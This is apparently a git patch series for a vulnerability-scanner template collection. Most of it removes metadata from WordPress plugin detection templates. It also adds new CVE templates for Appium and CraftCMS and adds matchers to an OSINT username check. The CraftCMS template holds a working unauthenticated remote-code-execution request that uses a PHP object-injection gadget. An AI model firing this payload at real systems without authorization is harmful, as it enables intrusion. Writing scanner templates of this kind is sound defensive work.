     plugin_namespace: velvet-blues-update-urls
     wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 2366a7dad7..8995434fce 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/w3-total-cache/
   metadata:
-    max-request: 1
     plugin_namespace: w3-total-cache
     wpscan: https://wpscan.com/plugin/w3-total-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 71448e61e8..8175806cb8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-converter-for-media/
   metadata:
-    max-request: 1
     plugin_namespace: webp-converter-for-media
     wpscan: https://wpscan.com/plugin/webp-converter-for-media
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index 717554b89f..db82bc7f43 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-express/
   metadata:
-    max-request: 1
     plugin_namespace: webp-express
     wpscan: https://wpscan.com/plugin/webp-express
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index fba5c8b09c..03ddae57bc 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/widget-importer-exporter/
   metadata:
-    max-request: 1
     plugin_namespace: widget-importer-exporter
     wpscan: https://wpscan.com/plugin/widget-importer-exporter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index 631202198e..d6449bb5bf 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-cart-abandonment-recovery/
   metadata:
-    max-request: 1
     plugin_namespace: woo-cart-abandonment-recovery
     wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index cc953078eb..2d5fdf1779 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-checkout-field-editor-pro/
   metadata:
-    max-request: 1
     plugin_namespace: woo-checkout-field-editor-pro
     wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 97ce674116..6b5705e20d 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-variation-swatches/
   metadata:
-    max-request: 1
     plugin_namespace: woo-variation-swatches
     wpscan: https://wpscan.com/plugin/woo-variation-swatches
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index 6d05a6f058..dbcdb64bad 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-gateway-paypal-express-checkout
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index baf5af3bb5..fb9ea502ce 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-stripe/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-gateway-stripe
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index aa1898c4ba..48ffb25245 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-payments/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-payments
     wpscan: https://wpscan.com/plugin/woocommerce-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 5fae796fdd..4fa6fc3ffe 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-paypal-payments/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-paypal-payments
     wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 22f812e2b8..1c1c690fcd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-pdf-invoices-packing-slips
     wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index c637006d26..4d6702d81a 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-services/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-services
     wpscan: https://wpscan.com/plugin/woocommerce-services
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index e020507ccb..42cb8bc409 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce
     wpscan: https://wpscan.com/plugin/woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index c92903fd79..55d6effbf5 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordfence/
   metadata:
-    max-request: 1
     plugin_namespace: wordfence
     wpscan: https://wpscan.com/plugin/wordfence
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index c25b2c1c48..6786cab703 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-importer/
   metadata:
-    max-request: 1
     plugin_namespace: wordpress-importer
     wpscan: https://wpscan.com/plugin/wordpress-importer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 4d6dd14d25..784ba22c8a 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-seo/
   metadata:
-    max-request: 1
     plugin_namespace: wordpress-seo
     wpscan: https://wpscan.com/plugin/wordpress-seo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 7ca0870ed6..72ff55e58a 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/worker/
   metadata:
-    max-request: 1
     plugin_namespace: worker
     wpscan: https://wpscan.com/plugin/worker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 4f0d9be568..8cfaa0f5a9 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-fastest-cache/
   metadata:
-    max-request: 1
     plugin_namespace: wp-fastest-cache
     wpscan: https://wpscan.com/plugin/wp-fastest-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index f3c481b824..85900a01a7 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-file-manager/
   metadata:
-    max-request: 1
     plugin_namespace: wp-file-manager
     wpscan: https://wpscan.com/plugin/wp-file-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index ba214fd7ea..a7ccde0b49 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-google-maps/
   metadata:
-    max-request: 1
     plugin_namespace: wp-google-maps
     wpscan: https://wpscan.com/plugin/wp-google-maps
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 8f5fe8d9a5..422664a98c 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-mail-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: wp-mail-smtp
     wpscan: https://wpscan.com/plugin/wp-mail-smtp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index 0458b13354..f0af3a748a 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-maintenance-mode/
   metadata:
-    max-request: 1
     plugin_namespace: wp-maintenance-mode
     wpscan: https://wpscan.com/plugin/wp-maintenance-mode
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index d570be07bf..f89f1a20b3 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-migrate-db/
   metadata:
-    max-request: 1
     plugin_namespace: wp-migrate-db
     wpscan: https://wpscan.com/plugin/wp-migrate-db
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index ee05e3add8..01fb12d0ad 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-multibyte-patch/
   metadata:
-    max-request: 1
     plugin_namespace: wp-multibyte-patch
     wpscan: https://wpscan.com/plugin/wp-multibyte-patch
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index df2487955f..1773857e15 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-optimize/
   metadata:
-    max-request: 1
     plugin_namespace: wp-optimize
     wpscan: https://wpscan.com/plugin/wp-optimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index 79ff01211c..bcd1509c68 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-pagenavi/
   metadata:
-    max-request: 1
     plugin_namespace: wp-pagenavi
     wpscan: https://wpscan.com/plugin/wp-pagenavi
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index 23414b3d1d..c6aca20a60 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reset/
   metadata:
-    max-request: 1
     plugin_namespace: wp-reset
     wpscan: https://wpscan.com/plugin/wp-reset
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
index fba45020e4..56dfdf4a59 100644
--- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
+++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reviews-plugin-for-google/
   metadata:
-    max-request: 1
     plugin_namespace: wp-reviews-plugin-for-google
     wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml
index 0178c8e9fb..810fc82cde 100644
--- a/http/technologies/wordpress/plugins/wp-rollback.yaml
+++ b/http/technologies/wordpress/plugins/wp-rollback.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-rollback/
   metadata:
-    max-request: 1
     plugin_namespace: wp-rollback
     wpscan: https://wpscan.com/plugin/wp-rollback
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index a04ddc6003..783d381ed8 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-sitemap-page/
   metadata:
-    max-request: 1
     plugin_namespace: wp-sitemap-page
     wpscan: https://wpscan.com/plugin/wp-sitemap-page
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index 2ead906817..27f6d46c2b 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -1,13 +1,12 @@
 id: wordpress-wp-smushit
 
 info:
-  name: Smush – Lazy Load Images, Optimize & Compress Images Detection
+  name: Smush – Optimize, Compress and Lazy Load Images Detection
   author: ricardomaia
   severity: info
   reference:
     - https://wordpress.org/plugins/wp-smushit/
   metadata:
-    max-request: 1
     plugin_namespace: wp-smushit
     wpscan: https://wpscan.com/plugin/wp-smushit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index dedd2e23b6..ab61cc0338 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-statistics/
   metadata:
-    max-request: 1
     plugin_namespace: wp-statistics
     wpscan: https://wpscan.com/plugin/wp-statistics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 03cd7137a8..5f6fbc1f75 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-super-cache/
   metadata:
-    max-request: 1
     plugin_namespace: wp-super-cache
     wpscan: https://wpscan.com/plugin/wp-super-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index a68d4b7d78..d67150d038 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-user-avatar/
   metadata:
-    max-request: 1
     plugin_namespace: wp-user-avatar
     wpscan: https://wpscan.com/plugin/wp-user-avatar
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index bf9dfc3ad8..beeba7ca69 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-recaptcha/
   metadata:
-    max-request: 1
     plugin_namespace: wpcf7-recaptcha
     wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index 47911a86a5..c225df7bfd 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-redirect/
   metadata:
-    max-request: 1
     plugin_namespace: wpcf7-redirect
     wpscan: https://wpscan.com/plugin/wpcf7-redirect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index 1c25b6f488..aaad04cb76 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpforms-lite/
   metadata:
-    max-request: 1
     plugin_namespace: wpforms-lite
     wpscan: https://wpscan.com/plugin/wpforms-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index b36317acd8..ff750a7d2a 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wps-hide-login/
   metadata:
-    max-request: 1
     plugin_namespace: wps-hide-login
     wpscan: https://wpscan.com/plugin/wps-hide-login
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index 5eb35dd17e..f1e7595ccd 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpvivid-backuprestore/
   metadata:
-    max-request: 1
     plugin_namespace: wpvivid-backuprestore
     wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index ceb2b8d600..4b2769ee46 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/yith-woocommerce-wishlist/
   metadata:
-    max-request: 1
     plugin_namespace: yith-woocommerce-wishlist
     wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
   tags: tech,wordpress,wp-plugin,top-100,top-200

From a711c0cc04c1900a18b86ee0538d6d5f9917f75b Mon Sep 17 00:00:00 2001
From: zn9988 
Date: Fri, 15 Sep 2023 15:11:13 +0800
Subject: [PATCH 0361/1090] Create CVE-2023-2479.yaml

---
 http/cves/2023/CVE-2023-2479.yaml | 53 +++++++++++++++++++++++++++++++
 1 file changed, 53 insertions(+)
 create mode 100644 http/cves/2023/CVE-2023-2479.yaml

diff --git a/http/cves/2023/CVE-2023-2479.yaml b/http/cves/2023/CVE-2023-2479.yaml
new file mode 100644
index 0000000000..54d902d607
--- /dev/null
+++ b/http/cves/2023/CVE-2023-2479.yaml
@@ -0,0 +1,53 @@
+id: CVE-2023-2479
+
+info:
+  name: Zero Click Remote Code Execution on Appium Desktop Server
+  author: zn9988, Aden Yap Chuen Zhen (chuenzhen.yap2@baesystems.com)
+  severity: Critical
+  description: Appium Desktop Server is susceptible to an unauthenticated remote code execution vulnerability.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-2479
+  reference: 
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-2479
+    - https://huntr.dev/bounties/fbdeec3c-d197-4a68-a547-7f93fb9594b4/
+  tags: http,rce,dast,oast,cve,electron
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/?url='
+      
+    matchers-condition: and
+    matchers:
+          # Response String
+        - type: word
+          part: body
+          words: 
+            - "The requested resource could not be found, or a request was received using an HTTP method that is not supported by the mapped resource"
+
+          # Status Code
+        - type: status
+          status:
+            - 404
+            
+          # Content Type
+        - type: word
+          part: header
+          words:
+            - "application/json"
+
+          # Response Header
+        - type: word
+          part: header
+          words:
+            - "X-Powered-By: Express"
+        
+          # Captured the interact callbacks
+        - type: word
+          part: interactsh_protocol
+          condition: or
+          words:
+            - "dns"
+            - "http" 

From d405588ec122432e0d9d9dbd891b07dc0529a642 Mon Sep 17 00:00:00 2001
From: Prince Chaddha 
Date: Fri, 15 Sep 2023 12:44:48 +0530
Subject: [PATCH 0362/1090] Create CVE-2023-41892.yaml

---
 http/cves/2023/CVE-2023-41892.yaml | 42 ++++++++++++++++++++++++++++++
 1 file changed, 42 insertions(+)
 create mode 100644 http/cves/2023/CVE-2023-41892.yaml

diff --git a/http/cves/2023/CVE-2023-41892.yaml b/http/cves/2023/CVE-2023-41892.yaml
new file mode 100644
index 0000000000..ee2f6780f5
--- /dev/null
+++ b/http/cves/2023/CVE-2023-41892.yaml
@@ -0,0 +1,42 @@
+id: CVE-2023-41892
+
+info:
+  name: CraftCMS < 4.4.15 - Unauthenticated Remote Code Execution
+  author: iamnoooob,rootxharsh,pdresearch
+  severity: critical
+  description: Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector leading to Remote Code Execution (RCE). Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.
+  reference:
+    - https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g
+    - https://blog.calif.io/p/craftcms-rce
+    - https://github.com/craftcms/cms/blob/develop/CHANGELOG.md#4415---2023-07-03-critical
+    - https://github.com/craftcms/cms/commit/7359d18d46389ffac86c2af1e0cd59e37c298857
+    - https://github.com/craftcms/cms/commit/a270b928f3d34ad3bd953b81c304424edd57355e
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L
+    cvss-score: 10
+    cve-id: CVE-2023-41892
+    cwe-id: CWE-94
+    epss-score: 0.00044
+    epss-percentile: 0.08209
+  tags: cve,cve2023,rce,unauth,craftcms
+
+http:
+  - raw:
+      - |
+        POST /index.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream",    "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "PHP Version"
+          - "PHP Extension"
+        condition: and
+
+      - type: status
+        status:
+          - 200

From bf11edfbf02d59cc1352c37bd6a543ce15f6a45b Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 15 Sep 2023 14:26:02 +0530
Subject: [PATCH 0363/1090] added word matcher

---
 http/osint/yeswehack.yaml | 15 ++++++++++++---
 1 file changed, 12 insertions(+), 3 deletions(-)

diff --git a/http/osint/yeswehack.yaml b/http/osint/yeswehack.yaml
index 5c4cb1cb08..7c77babf84 100644
--- a/http/osint/yeswehack.yaml
+++ b/http/osint/yeswehack.yaml
@@ -3,16 +3,16 @@ id: yeswehack
 info:
   name: Yeswehack User Name Information - Detect
   author: philippedelteil
-  description: Yeswehack user name information check was conducted. (https://yeswehack.com/). 
-               Detection will work if the profile is set to be public. 
   severity: info
+  description: |
+    Yeswehack user name information check was conducted. Detection will work if the profile is set to be public.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
     cvss-score: 0.0
     cwe-id: CWE-200
-  tags: osint,osint-tech,yeswehack
   metadata:
     max-request: 1
+  tags: osint,osint-tech,yeswehack
 
 self-contained: true
 http:
@@ -22,6 +22,15 @@ http:
 
     matchers-condition: and
     matchers:
+      - type: word
+        part: body
+        words:
+          - '"username":"{{user}}"'
+          - '"kyc_status":'
+          - 'hunter_profile'
+        condition: and
+        case-insensitive: true
+
       - type: status
         status:
           - 200

From 3ce8359a4a32746a1a8ce3d0be45f5475456ee59 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 15 Sep 2023 14:37:50 +0530
